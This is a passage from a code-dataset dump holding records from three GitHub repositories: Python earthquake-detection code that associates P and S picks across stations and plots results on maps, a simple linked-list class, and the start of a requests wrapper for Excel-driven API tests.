'pP','Pn']))+quake['time']\r\n sTime0= self.getEarliest(taupModel.get_travel_times(dep, deg, \\\r\n ['s', 'S', 'SS', 'sS','Sn']))+quake['time']\r\n time0L = [pTime0,sTime0]\r\n for i in range(2):\r\n time0= time0L[i]\r\n bTime=time0+bCount*self.data.Delta()\r\n eTime=time0+eCount*self.data.Delta()\r\n bIndex=int((time0+bSec-bTime)/self.data.Delta())\r\n eIndex=int((time0+eSec-bTime)/self.data.Delta())\r\n if self.data.bTimeeTime:\r\n data = self.data.Data(bTime=bTime,eTime=eTime)\r\n if len(data)>4000:\r\n y = predictLongData(modelL[i], data,indexL =range(275, 775))\r\n yMax = y[bIndex:eIndex].max()\r\n proL[i]=yMax\r\n if yMax>=0.5:\r\n timeL[i]=(y[bIndex:eIndex].argmax()+bIndex)*self.data.Delta()+bTime\r\n return timeL+proL\r\n\r\n def getEarliest(self,arrivals):\r\n time=10000000\r\n if len(arrivals)==0:\r\n print('no phase')\r\n return 0\r\n for arrival in arrivals:\r\n time = min(time, arrival.time)\r\n return time\r\ndef argMax2D(M):\r\n maxValue = np.max(M)\r\n maxIndex = np.where(M==maxValue)\r\n return maxIndex[0][0], maxIndex[1][0]\r\n\r\ndef associateSta(staL, aMat, staTimeML, timeR=30, minSta=3, maxDTime=3, N=1, \\\r\n isClearData=False, locator=None, maxD=80,**kwargs):\r\n timeN = int(timeR)*2\r\n startTime = obspy.UTCDateTime(2100, 1, 1)\r\n endTime = obspy.UTCDateTime(1970, 1, 1)\r\n staN = len(staL)\r\n for staIndex in range(staN):\r\n if isClearData:\r\n staL[staIndex].clearData()\r\n staL[staIndex].isPick = staL[staIndex].isPick*0\r\n for staTmp in 
staL:\r\n if staTmp.data.bTime<=t0+10:\r\n continue\r\n startTime = min(startTime, staTmp.data.bTime)\r\n endTime = max(endTime, staTmp.data.eTime)\r\n startSec = int(startTime.timestamp-3600)\r\n endSec = int(endTime.timestamp+3600)\r\n if N==1:\r\n quakeL=QuakeL()\r\n __associateSta(quakeL, staL, \\\r\n aMat, staTimeML, startSec, \\\r\n endSec, timeR=timeR, minSta=minSta,\\\r\n maxDTime=maxDTime,locator=locator,maxD=maxD,**kwargs)\r\n return quakeL\r\n for i in range(len(staL)):\r\n staL[i].clearData()\r\n manager=Manager()\r\n quakeLL=[manager.list() for i in range(N)]\r\n perN = int(int((endSec-startSec)/N+1)/timeN+1)*timeN\r\n processes=[]\r\n for i in range(N):\r\n process=Process(target=__associateSta, args=(quakeLL[i], \\\r\n staL, aMat, staTimeML, startSec+i*perN, \\\r\n startSec+(i+1)*perN+1))\r\n #process.setDaemon(True)\r\n process.start()\r\n processes.append(process)\r\n\r\n for process in processes:\r\n print(process)\r\n process.join()\r\n\r\n for quakeLTmp in quakeLL:\r\n for quakeTmp in quakeLTmp:\r\n quakeL.append(quakeTmp)\r\n return quakeL\r\n \r\n\r\ndef __associateSta(quakeL, staL, aMat, staTimeML, startSec, endSec, \\\r\n timeR=30, minSta=3, maxDTime=3, locator=None,maxD=80,maxDA=-1,\\\r\n taupM=tool.quickTaupModel(),halfMaxDTime=0,loopN=2):\r\n typeO = np.int16#in maxD determined Range, if the max station cound is small than 125,use np.int8 else\r\n #,Using np.int16\r\n print('start', startSec, endSec)\r\n if maxDA<0:\r\n maxDA = maxD\r\n laN = aMat.laN\r\n loN = aMat.loN\r\n staN = len(staL)\r\n timeN = int(timeR)*90\r\n stackM = np.zeros((timeN*3, laN, loN),typeO)\r\n tmpStackM=np.zeros((timeN*3+3*maxDTime, laN, loN),typeO)\r\n stackL = np.zeros(timeN*3)\r\n quakeCount=0\r\n dTimeL =np.arange(-maxDTime, maxDTime+1)\r\n dTimeLA =np.arange(-maxDTime, maxDTime+1)*0+2\r\n if halfMaxDTime>0:\r\n dTimeL =np.arange(-maxDTime-halfMaxDTime, maxDTime+1+halfMaxDTime)\r\n dTimeLA = dTimeL*0+2\r\n dTimeLA[:halfMaxDTime]=1\r\n dTimeLA[-halfMaxDTime:]=1\r\n for loop in range(loopN):\r\n staOrignMIndex = np.zeros((staN, laN, loN), dtype=int)\r\n count=0\r\n for sec0 in range(startSec-3*timeN, endSec+3*timeN, timeN):\r\n count=count+1\r\n if count%5==0:\r\n print(ctime(),'process:',(sec0-startSec)/(endSec-startSec)*100,' find:',len(quakeL))\r\n stackM[0:2*timeN, :, :] = stackM[timeN:, :, :]\r\n stackM[2*timeN:, :, :] = stackM[0:timeN, :, :]*0\r\n tmpStackM=tmpStackM*0\r\n st=sec0+2*timeN - maxDTime\r\n et=sec0+3*timeN + maxDTime\r\n for staIndex in range(staN):\r\n tmpStackM=tmpStackM*0\r\n for laIndex in range(laN):\r\n for loIndex in range(loN):\r\n if staTimeML[staIndex].minTimeD[laIndex,loIndex] > maxDA:\r\n continue\r\n if len(staL[staIndex].orignM[laIndex][loIndex])>0:\r\n index0=staOrignMIndex[staIndex, laIndex, loIndex]\r\n for index in range(index0, len(staL[staIndex].orignM[laIndex][loIndex])):\r\n timeT = staL[staIndex].orignM[laIndex][loIndex][index][2]\r\n pairIndex = staL[staIndex].orignM[laIndex][loIndex][index][3]\r\n if timeT >et:\r\n staOrignMIndex[staIndex, laIndex, loIndex] = index\r\n break\r\n if timeT > st and staL[staIndex].isPick[pairIndex]==0:\r\n pIndex = staL[staIndex].pairD[pairIndex][4]\r\n sIndex = staL[staIndex].pairD[pairIndex][5]\r\n pTime = staL[staIndex].timeL[0][pIndex]\r\n sTime = staL[staIndex].timeL[1][sIndex]\r\n staOrignMIndex[staIndex, laIndex, loIndex] = index\r\n if pTime * sTime ==0:\r\n continue\r\n tmpStackM[round(timeT-sec0)+dTimeL, laIndex, loIndex]=\\\r\n np.max([tmpStackM[round(timeT-sec0)+dTimeL, laIndex, 
loIndex],dTimeLA],axis=0)\r\n '''\r\n for dt in range(-maxDTime, maxDTime+1):\r\n tmpStackM[int(timeT-sec0+dt), laIndex, loIndex]=1\r\n '''\r\n stackM[2*timeN: 3*timeN, :, :] += tmpStackM[2*timeN: 3*timeN, :, :]\r\n stackL = stackM.max(axis=(1,2))\r\n peakL, peakN = tool.getDetec(stackL, minValue=minSta*dTimeLA.max(), minDelta=timeR)\r\n for peak in peakL:\r\n if peak > timeN and peak <= 2*timeN:\r\n time = peak + sec0\r\n laIndex, loIndex = argMax2D(stackM[peak, :, :].reshape((laN, loN)))\r\n quakeCount+=1\r\n quake = Quake(la=aMat[laIndex][loIndex].midLa,lo=aMat[laIndex][loIndex].midLo,\\\r\n dep=10.0,\\\r\n time=time, randID=quakeCount)\r\n for staIndex in range(staN):\r\n isfind=0\r\n if staTimeML[staIndex].minTimeD[laIndex,loIndex] > maxD:\r\n continue\r\n if len(staL[staIndex].orignM[laIndex][loIndex]) != 0:\r\n for index in range(staOrignMIndex[staIndex, laIndex, loIndex], -1, -1):\r\n if int(abs(staL[staIndex].orignM[laIndex][loIndex][index][2]-time))<=maxDTime:\r\n if staL[staIndex].isPick[staL[staIndex].\\\r\n orignM[laIndex][loIndex][index][3]]==0:\r\n pairDIndex = staL[staIndex].orignM[laIndex][loIndex][index][3]\r\n pIndex = staL[staIndex].pairD[pairDIndex][4]\r\n sIndex = staL[staIndex].pairD[pairDIndex][5]\r\n if staL[staIndex].timeL[0][pIndex] > 0 and \\\r\n staL[staIndex].timeL[1][sIndex] > 0:\r\n quake.Append(Record(staIndex=staIndex, \\\r\n pTime=staL[staIndex].orignM[laIndex][loIndex][index][0], \\\r\n sTime=staL[staIndex].orignM[laIndex][loIndex][index][1],\\\r\n pProb=staL[staIndex].vL[0][pIndex],\\\r\n sProb=staL[staIndex].vL[1][sIndex]))\r\n isfind=1\r\n staL[staIndex].timeL[0][pIndex] = 0\r\n staL[staIndex].timeL[1][sIndex] = 0\r\n staL[staIndex].isPick[pairDIndex] = 1\r\n break\r\n if staL[staIndex].orignM[laIndex][loIndex][index][2] < time - maxDTime:\r\n break\r\n if isfind==0:\r\n pTime=0\r\n sTime=0\r\n pProb=-1\r\n sProb=-1\r\n pTimeL=staL[staIndex].timeL[0]*staL[staIndex].data.delta\\\r\n +staL[staIndex].data.bTime.timestamp\r\n sTimeL=staL[staIndex].timeL[1]*staL[staIndex].data.delta\\\r\n +staL[staIndex].data.bTime.timestamp\r\n pTimeMin=time+staTimeML[staIndex].minTimeP[laIndex,loIndex]-maxDTime\r\n pTimeMax=time+staTimeML[staIndex].maxTimeP[laIndex,loIndex]+maxDTime\r\n sTimeMin=time+staTimeML[staIndex].minTimeS[laIndex,loIndex]-maxDTime\r\n sTimeMax=time+staTimeML[staIndex].maxTimeS[laIndex,loIndex]+maxDTime\r\n validP=np.where((pTimeL/1e5-pTimeMin/1e5)*(pTimeL/1e5-pTimeMax/1e5)<=0)\r\n if len(validP)>0:\r\n if len(validP[0])>0:\r\n if pTimeL[validP[0]][0]<=(time+maxD/0.7+maxDTime):\r\n pTime=pTimeL[validP[0]][0]\r\n pIndex=validP[0][0]\r\n pProb = staL[staIndex].vL[0][pIndex]\r\n if pTime < 1:\r\n continue\r\n validS=np.where((sTimeL-sTimeMin)*(sTimeL-sTimeMax) < 0)\r\n if len(validS)>0:\r\n if len(validS[0])>0:\r\n if sTimeL[validS[0]][0]<=(time+maxD*1.7/0.7+maxDTime):\r\n sTime=sTimeL[validS[0]][0]\r\n sIndex=validS[0][0]\r\n sProb = staL[staIndex].vL[1][sIndex]\r\n if pTime >1 and sTime>1:\r\n if np.abs(taupM.get_orign_times(pTime,sTime)-time)>=maxDTime:\r\n continue\r\n if pTime > 1:\r\n staL[staIndex].timeL[0][pIndex]=0\r\n if sTime >1:\r\n staL[staIndex].timeL[1][sIndex]=0\r\n quake.Append(Record(staIndex=staIndex, pTime=pTime, sTime=sTime, pProb=pProb, sProb=sProb))\r\n if locator != None and len(quake)>=3:\r\n try:\r\n quake,res=locator.locate(quake,isDel=True,maxErr=4)\r\n print(quake['time'],quake.loc(),res)\r\n except:\r\n print('wrong in locate')\r\n else:\r\n if res > 10:\r\n continue\r\n quakeL.append(quake)\r\n return quakeL\r\n\r\ndef 
getStaTimeL(staInfos, aMat,taupM=tool.quickTaupModel(),**kwarg):\r\n #manager=Manager()\r\n #staTimeML=manager.list()\r\n staTimeML=list()\r\n count =0\r\n for staInfo in staInfos:\r\n print(count,staInfo)\r\n loc=staInfo.loc()[:2]\r\n staTimeML.append(staTimeMat(loc, aMat, taupM=taupM,**kwarg))\r\n count+=1\r\n return staTimeML\r\n\r\ndef getSta(staL,i, staInfo, date, modelL, staTimeM, loc, \\\r\n freq,getFileName,taupM, mode,isPre=True,R=[-90,90,\\\r\n -180,180],comp=['BHE','BHN','BHZ'],maxD=80,delta0=0.02,\\\r\n bTime=None,eTime=None):\r\n staL[i] = sta(staInfo, date, modelL, staTimeM, loc, \\\r\n freq=freq, getFileName=getFileName, taupM=taupM, \\\r\n mode=mode,isPre=isPre,R=R,comp=comp,maxD=maxD,\\\r\n delta0=delta0,bTime=bTime,eTime=eTime)\r\ndef preSta(staL,i, staInfo, date, modelL, staTimeM, loc, \\\r\n freq,getFileName,taupM, mode,isPre=True,R=[-90,90,\\\r\n -180,180],comp=['BHE','BHN','BHZ'],maxD=80,delta0=0.02,\\\r\n bTime=None,eTime=None):\r\n staL[i].predict(staInfo, date, modelL, staTimeM, loc, \\\r\n freq=freq, getFileName=getFileName, taupM=taupM, \\\r\n mode=mode,isPre=isPre,R=R,comp=comp,maxD=maxD,\\\r\n delta0=delta0,bTime=bTime,eTime=eTime)\r\n\r\n\r\n'''\r\nself, station, day,freq=[-1, -1], \\\r\n taupM=tool.quickTaupModel(),delta0=0.02,\\\r\n R=[-91,91,-181,181],bTime=None,eTime=None\r\nself,modelL=None, staTimeM=None,\\\r\n mode='mid', isClearData=False,maxD=80\r\n '''\r\ndef getStaL(staInfos, staTimeML=[], modelL=[],\\\r\n date=obspy.UTCDateTime(0),taupM=tool.quickTaupModel(),\\\r\n mode='mid',isPre=True,f=[2, 15],R=[-90,90,\\\r\n -380,380],maxD=80,f_new=[-1,-1],delta0=0.02,resampleN=-1,\\\r\n isClearData=False,decPre=1,maxDTime=2):\r\n staL=[None for i in range(len(staInfos))]\r\n threads = list()\r\n for i in range(len(staInfos)): \r\n print(ctime(),'process on sta: ',i,date,staInfos[i])\r\n staL[i]=sta(staInfos[i], date,\r\n f, taupM,R=R,delta0=delta0)\r\n staL[i].filt(f_new)\r\n staL[i].resample(resampleN)\r\n #print(ctime(),'processed on sta: ',staL[i].data)\r\n if not isPre:\r\n return staL\r\n for i in range(len(staInfos)):\r\n if len(staTimeML)>0:\r\n staTimeM=staTimeML[i]\r\n else:\r\n staTimeM=None\r\n print(ctime(),'predict on sta: ',i,date)\r\n staL[i].predict(modelL, staTimeM, mode,\\\r\n maxD=maxD,maxDTime=maxDTime,isClearData=isClearData,decPre=decPre)\r\n return staL\r\ndef getForQuake(staL,quakes,modelL,**kwargs):\r\n for quake in quakes:\r\n for count in range(len(staL)):\r\n sta = staL[count]\r\n if len(sta.data)==3:\r\n pTime,sTime,pProb,sProb = sta.pickQuake(quake,modelL,**kwargs)\r\n if pTime > 0 :\r\n quake.records.append(Record(staIndex=count,pTime=pTime,sTime=sTime,pProb=pProb,sProb=sProb))\r\n print(quake['time'],count,pTime,sTime,pProb,sProb)\r\n\r\n\r\ndef getStaQuick(staInfos,date,f,taupM,R,delta0,f_new,resampleN):\r\n for i in range(len(staInfos)): \r\n print(ctime(),'process on sta: ',date,i)\r\n sta=sta(staInfos[i], date,\r\n f, taupM,R=R,delta0=delta0)\r\n sta.filt(f_new)\r\n sta.resample(resampleN)\r\n\r\nfrom ..io.parRead import StaReader,DataLoader,collate_function\r\ndef getStaLQuick(staInfos, staTimeML=[], modelL=[],\\\r\n date=obspy.UTCDateTime(0),taupM=tool.quickTaupModel(),\\\r\n mode='mid',isPre=True,f=[2, 15],R=[-90,90,\\\r\n -180,180],maxD=80,f_new=[-1,-1],delta0=0.02,resampleN=-1,\\\r\n isClearData=False,num_workers=5):\r\n staReader = StaReader(staInfos,getStaLQuick,date,f,taupM,R,delta0,f_new,resampleN)\r\n parReader = DataLoader(staReader,batch_size=1,collate_fn=collate_function,num_workers=num_workers)\r\n staL=[]\r\n 
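    # The StaReader/DataLoader pair from ..io.parRead is assumed to yield
    # batches that are themselves lists of sta objects (one per worker task),
    # which is why the nested loop below flattens each batch into staL.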
for tmp in parReader:\r\n for t in tmp:\r\n staL.append(t)\r\n if not isPre:\r\n return staL\r\n for i in range(len(staInfos)):\r\n if len(staTimeML)>0:\r\n staTimeM=staTimeML[i]\r\n else:\r\n staTimeM=None\r\n print(ctime(),'predict on sta: ',date,i)\r\n staL[i].predict(modelL, staTimeM, mode,\\\r\n maxD=maxD,isClearData=isClearData)\r\n return staL\r\n\r\n\r\ndef showExample(filenameL,modelL,delta=0.02,t=[]):\r\n data=getTrace3ByFileName(filenameL,freq=[2,15])\r\n data=data.Data()[:2000*50]\r\n \r\n #i0=int(750/delta)\r\n #i1=int(870/delta)\r\n #plt.specgram(np.sign(data[i0:i1,1])*(np.abs(data[i0:i1,1])**0.5),NFFT=200,Fs=50,noverlap=190)\r\n data/=data.max()/2\r\n #plt.colorbar()\r\n #plt.show()\r\n plt.close()\r\n plt.figure(figsize=[4,4])\r\n yL=[predictLongData(modelL[i],data) for i in range(2)]\r\n timeL=np.arange(data.shape[0])*delta-720\r\n #print(data.shape,timeL.shape)\r\n for i in range(3):\r\n plt.plot(timeL,np.sign(data[:,i])*(np.abs(data[:,i]))+i,'k',linewidth=0.3)\r\n for i in range(2):\r\n plt.plot(timeL,yL[i]-i-1.5,'k',linewidth=0.5)\r\n if len(t)>0:\r\n plt.xlim(t)\r\n plt.yticks(np.arange(-2,3),['S','P','E','N','Z'])\r\n plt.ylim([-2.7,3])\r\n plt.xlabel('t/s')\r\n plt.savefig('fig/complexCondition.eps')\r\n plt.savefig('fig/complexCondition.tiff',dpi=300)\r\n plt.close()\r\n \r\n\r\ndef showExampleV2(filenameL,modelL,delta=0.02,t=[],staName='sta'):\r\n data=getTrace3ByFileName(filenameL,freq=[2,15],delta=delta)\r\n data=data.Data()[:3500*50]\r\n \r\n #i0=int(750/delta)\r\n #i1=int(870/delta)\r\n #plt.specgram(np.sign(data[i0:i1,1])*(np.abs(data[i0:i1,1])**0.5),NFFT=200,Fs=50,noverlap=190)\r\n data/=data.max()/2\r\n #plt.colorbar()\r\n #plt.show()\r\n plt.close()\r\n plt.figure(figsize=[4,4])\r\n yL=[predictLongData(model,data) for model in modelL]\r\n timeL=np.arange(data.shape[0])*delta-720\r\n #print(data.shape,timeL.shape)\r\n for i in range(3):\r\n plt.plot(timeL,np.sign(data[:,i])*(np.abs(data[:,i]))+i,'k',linewidth=0.3)\r\n for i in range(len(modelL)):\r\n plt.plot(timeL,yL[i]-i-1.5,'k',linewidth=0.5)\r\n #plt.plot(timeL,yL[i]*0+0.5-i-1.5,'--k',linewidth=0.5)\r\n if len(t)>0:\r\n plt.xlim(t)\r\n plt.yticks(np.arange(-4,3),['S1','S0','P1','P0','E','N','Z'])\r\n plt.ylim([-4.7,3])\r\n plt.xlabel('t/s')\r\n plt.savefig('fig/complexConditionV2_%s.eps'%staName)\r\n plt.savefig('fig/complexConditionV2_%s.tiff'%staName,dpi=300)\r\n plt.close()\r\n\r\ndef plotRes(staL, quake, filename=None):\r\n colorStr='br'\r\n for record in quake.records:\r\n color=0\r\n pTime=record['pTime']\r\n sTime=record['sTime']\r\n staIndex=record['staIndex']\r\n if staIndex>100:\r\n color=1\r\n #print(staIndex,pTime,sTime)\r\n st=quake['time']-10\r\n et=sTime+40\r\n if sTime==0:\r\n et=pTime+60\r\n pD=(pTime-quake['time'])\r\n if pTime ==0:\r\n pD = ((sTime-quake['time'])/1.73)\r\n if staL[staIndex].data.bTime<0:\r\n continue\r\n #print(st, et, staL[staIndex].data.delta)\r\n timeL=np.arange(st, et, staL[staIndex].data.delta)\r\n #data = staL[staIndex].data.getDataByTimeL(timeL)\r\n data=staL[staIndex].data.getDataByTimeLQuick(timeL)\r\n if timeL.shape[0] != data.shape[0]:\r\n print('not same length for plot')\r\n continue\r\n if timeL.size<1:\r\n print(\"no timeL for plot\")\r\n continue\r\n indexL=np.arange(data.shape[0])\r\n if pTime>0:\r\n index0=max(int((pTime-5-st)/staL[staIndex].data.delta),0)\r\n index1=int((pTime+5-st)/staL[staIndex].data.delta)\r\n indexL=np.arange(index0,index1)\r\n #if record.pProb()>1 or record.pProb()<0:\r\n # plt.plot(timeL, data[:, 
2]/data[indexL,2].max()+pD,colorStr[color],linewidth=0.3)\r\n #else:\r\n if True:\r\n #color = prob2color(record['pProb'])\r\n if isinstance(quake,QuakeCC):\r\n color = prob2color(record['pCC'])\r\n pValue = record['pCC']\r\n sValue = record['sCC']\r\n else:\r\n color = prob2color(record['pProb'])\r\n pValue = record['pProb']\r\n sValue = record['sProb']\r\n plt.plot(timeL, data[:, 2]/data[indexL,2].max()+pD,color=color,linewidth=0.3)\r\n plt.text(timeL[0],pD+0.5,'%s %.2f %.2f'%(staL[staIndex].station,pValue,\\\r\n sValue))\r\n if pTime>0:\r\n plt.plot([pTime, pTime], [pD+2, pD-2], 'g',linewidth=0.5)\r\n if sTime >0:\r\n plt.plot([sTime, sTime], [pD+2, pD-2], 'r',linewidth=0.5)\r\n if isinstance(quake,QuakeCC):\r\n plt.title('%s %.3f %.3f %.3f %.3f cc:%.3f' % (obspy.UTCDateTime(quake['time']).\\\r\n ctime(), quake['la'], quake['lo'],quake['dep'],quake['ml'],quake['cc']))\r\n else:\r\n plt.title('%s %.3f %.3f %.3f %.3f' % (obspy.UTCDateTime(quake['time']).\\\r\n ctime(), quake['la'], quake['lo'],quake['dep'],quake['ml']))\r\n if filename==None:\r\n plt.show()\r\n if filename!=None:\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n plt.savefig(filename,dpi=200)\r\n plt.close()\r\n\r\ndef plotResS(staL,quakeL, outDir='output/'):\r\n for quake in quakeL:\r\n filename=outDir+'/'+quake['filename'][0:-3]+'png'\r\n #filename=outDir+'/'+str(quake.time)+'.jpg'\r\n #try:\r\n plotRes(staL,quake,filename=filename)\r\n #except:\r\n # pass\r\n #else:\r\n # pass\r\n\r\ndef plotQuakeL(staL,quakeL,laL,loL,outDir='output/',filename='',vModel=None,isPer=False):\r\n dayIndex = int(quakeL[-1]['time']/86400)\r\n Ymd = obspy.UTCDateTime(dayIndex*86400).strftime('%Y%m%d')\r\n if len(filename)==0:\r\n filename = '%s/%s_quake_loc.jpg'%(outDir,Ymd)\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[1])\r\n staLa= []\r\n staLo=[]\r\n for sta in staL:\r\n if sta.data.bTime>0:\r\n staLa.append(sta.loc[0])\r\n staLo.append(sta.loc[1])\r\n #staLa,staLo = staL.loc()\r\n staX,staY=m(np.array(staLo)%360,np.array(staLa))\r\n m.plot(staX,staY,'b^',markersize=4,alpha=0.2)\r\n eLa= []\r\n eLo=[]\r\n for quake in quakeL:\r\n eLa.append(quake['la'])\r\n eLo.append(quake['lo'])\r\n eX,eY=m(np.array(eLo)%360,np.array(eLa))\r\n #m.etopo()\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fault.plot(m,markersize=0.3)\r\n m.plot(eX,eY,'ro',markersize=0.5)\r\n parallels = np.arange(-90,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n plt.gca().yaxis.set_ticks_position('right')\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n plt.title(Ymd)\r\n plt.savefig(filename,dpi=300)\r\n plt.close()\r\n\r\ndef plotQuakeLDis(staInfos,quakeL,laL,loL,outDir='output/',filename='',isTopo=False,rL=[],R0=[],isBall=False,figSize=[6.2,5],width=0.06):\r\n dayIndex = int(quakeL[-1]['time']/86400)\r\n Ymd = obspy.UTCDateTime(dayIndex*86400).strftime('%Y%m%d')\r\n if len(filename)==0:\r\n filename = '%s/%s_quake_loc.jpg'%(outDir,Ymd)\r\n dayDir=os.path.dirname(filename)\r\n if not os.path.exists(dayDir):\r\n os.mkdir(dayDir)\r\n fig=plt.figure(figsize=figSize)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[-1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[-1])\r\n if len(staInfos)>0:\r\n req={'staInfos':staInfos,'minCover':0.5,'minMl':-5}\r\n else:\r\n req={'minMl':-5}\r\n req={}\r\n 
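    # Note: the bare req={} just above discards the filter dictionary built in
    # the preceding if/else, so the staInfos/minCover/minMl constraints are
    # effectively disabled when selecting quakes to plot; it reads like a
    # debugging override left in place.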
pL=quakeL.paraL(req=req)\r\n eX,eY,=m(np.array(pL['lo']),np.array(pL['la']))\r\n #m.etopo()\r\n ml,dep=[np.array(pL['ml']),np.array(pL['dep'])]\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fh=fault.plot(m,markersize=0.3)\r\n \r\n #m.plot(eX,eY,'ro',markersize=2)\r\n #m.etopo()\r\n if isTopo:\r\n plotTopo(m,laL+loL)\r\n #sc=m.scatter(eX,eY,c=dep,s=((ml*0+1)**2)*0.3/3,vmin=-5,vmax=50,cmap='gist_rainbow')#Reds\r\n #sc=m.scatter(eX,eY,c=dep,s=((ml*0+1)**2)*0.3/3,vmin=-5,vmax=50,cmap='jet')\r\n if not isBall:\r\n eh=m.plot(eX,eY,'.r',markersize=0.3,alpha=1,linewidth=0.01)\r\n else:\r\n ax = plt.axes()\r\n sdr0L=[]\r\n xyL=[]\r\n for quake in quakeL:\r\n sdr0L.append(quake['sdr0'])\r\n xyL.append((quake['lo'],quake['la']))\r\n ball=imaging.beachball.beach(sdr0L[-1],xy=xyL[-1],width=width,facecolor='r',size=20)\r\n ax.add_collection(ball) \r\n staLa= []\r\n staLo=[]\r\n for sta in staInfos:\r\n staLa.append(sta.loc()[0])\r\n staLo.append(sta.loc()[1])\r\n #staLa,staLo = staL.loc()\r\n staX,staY=m(np.array(staLo),np.array(staLa))\r\n sh=m.plot(staX,staY,'k^',markersize=3,alpha=1)\r\n #plt.legend([st,sc,f],['station','event','fault'])\r\n #m.arcgisimage()\r\n #plt.scatter()\r\n parallels = np.arange(0.,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n plt.gca().yaxis.set_ticks_position('left')\r\n #plt.title('Detection Results')\r\n #cbar=fig.colorbar(sc, orientation=\"horizontal\", fraction=0.046, pad=0.04)\r\n #cbar.set_label('Depth')\r\n #plt.colorbar()\r\n #plt.legend((sh,eh,fh),['station','earthquake','fault'],loc=1)\r\n fig.tight_layout()\r\n for R in rL:\r\n x,y=m(R.xyL[:,1],R.xyL[:,0])\r\n plt.arrow(x[0],y[0],x[1]-x[0],y[1]-y[0],color='b')\r\n plt.text(x[0],y[0],R.name,ha='left',va='bottom',c='b',size=12,weight='bold')\r\n plt.text(x[1],y[1],R.name+'\\'',ha='right',va='top',c='b',size=12,weight='bold')\r\n R=R0\r\n if len(R)>0:\r\n la = [R[0],R[0],R[1],R[1],R[0]]\r\n lo = [R[2],R[3],R[3],R[2],R[2]]\r\n x,y=m(lo,la)\r\n plt.plot(x,y,color='r',linewidth=1)\r\n plt.savefig(filename,dpi=300)\r\n\r\n plt.close()\r\n\r\ndef showStaCover(aMat,staTimeML,filename='cover.jpg'):\r\n fig=plt.figure(figsize=[5,5])\r\n aM = np.zeros([aMat.laN,aMat.loN])\r\n for staTimeM in staTimeML:\r\n aM[staTimeM.minTimeD<=21]+=1\r\n laL=[]\r\n loL=[]\r\n for a in aMat.subareas[0]:\r\n loL.append(a.midLo)\r\n for a in aMat.subareas:\r\n laL.append(a[0].midLa)\r\n m = basemap.Basemap(llcrnrlat=laL[0],urcrnrlat=laL[-1],llcrnrlon=loL[0],\\\r\n urcrnrlon=loL[-1])\r\n aX,aY=m(np.array(loL),np.array(laL))\r\n setMap(m)\r\n #m.pcolor(aX,aY,(aM.transpose()>2)*np.log(aM.transpose()+1),cmap='jet')\r\n pc=m.pcolor(aX,aY,(aM>2)*aM,cmap='jet')\r\n for fault in faultL:\r\n if fault.inR(laL+loL):\r\n fault.plot(m,markersize=0.3)\r\n cbar=fig.colorbar(pc, orientation=\"horizontal\",fraction=0.046, pad=0.04)\r\n cbar.set_label('Station Coverage')\r\n plt.savefig(filename,dpi=300)\r\n\r\ndef setMap(m):\r\n \r\n parallels = np.arange(0.,90,3)\r\n m.drawparallels(parallels,labels=[False,True,True,False])\r\n meridians = np.arange(10.,360.,3)\r\n m.drawmeridians(meridians,labels=[True,False,False,True])\r\n \r\n plt.gca().yaxis.set_ticks_position('left')\r\n\r\n\r\n\r\n'''\r\n\r\ndef getStaLByQuake(staInfos, aMat, staTimeML, modelL,quake,\\\r\n getFileName=originFileName,taupM=tool.quickTaupModel(), \\\r\n mode='mid', N=5,isPre=False,bTime=-100,delta0=0.02):\r\n staL=[None for i in range(len(staInfos))]\r\n 
threads = list()\r\n for i in range(len(staInfos)):\r\n staInfo=staInfos[i]\r\n nt = staInfo['net']\r\n st = staInfo['sta']\r\n loc = [staInfo['la'],staInfo['lo']]\r\n print('process on sta: ',i)\r\n dis=DistAz(quake.loc[0],quake.loc[1],staInfos[i]['la'],\\\r\n staInfos[i]['lo']).getDelta()\r\n date=obspy.UTCDateTime(quake.time+taupM.get_travel_times(quake.loc[2],dis)[0].time+bTime)\r\n getSta(staL, i, nt, st, date, modelL, staTimeML[i], loc, \\\r\n [0.01, 15], getFileName, taupM, mode,isPre=isPre,delta0=delta0)\r\n return staL\r\n'''\r\n","repo_name":"baogegeJiang/SeismTool","sub_path":"detector/detecQuake.py","file_name":"detecQuake.py","file_ext":"py","file_size_in_byte":38471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6237930367","text":"class Node:\n def __init__(self, data=None, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def linked_list(lis):\n node = Node(lis[0])\n head = node\n for i in range(1, len(lis)):\n node.next = Node(lis[i])\n node = node.next\n return head\n\n \n ","repo_name":"apoorvtyagii/DataStructuresAndAlgorithms","sub_path":"ds/linkedlist/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1795968518","text":"# coding:utf-8\n'''\n 封装requests方法\n'''\nimport json\nimport requests\n\nfrom Ademo_unittest_logging_email_test.common import read_excel\nfrom Ademo_unittest_logging_email_test.common.write_excel import copy_excel,Write_excel\n\ndef send_requests(testdata):\n '''封装requests请求'''\n id = testdata['id']\n case_name = testdata['case_name']\n method = testdata[\"method\"]\n url_base = testdata[\"url\"]\n # 因为发现读取接口url时,最后带上了换行符,所以把右边的空格全删除\n url = url_base.rstrip()\n # params\n #try:\n # eval(expression,globals=None,locals=None):expression:传入的表达式;globals是可选参数,不设置时,则必须为dict对象,locals:不为None时,可以是任何map对象\n #params = eval(testdata[\"params\"])\n #except:\n #params = None\n params = testdata['params']\n try:\n headers = eval(testdata[\"headers\"])\n print(\"请求头部:%s\" % headers)\n except:\n headers = None\n\n type = testdata[\"type\"]\n #test_api = testdata['func_name']\n test_nub = testdata['id']\n\n print(\"测试用例场景:%s\" % case_name)\n print(\"请求url: %s\" % url)\n 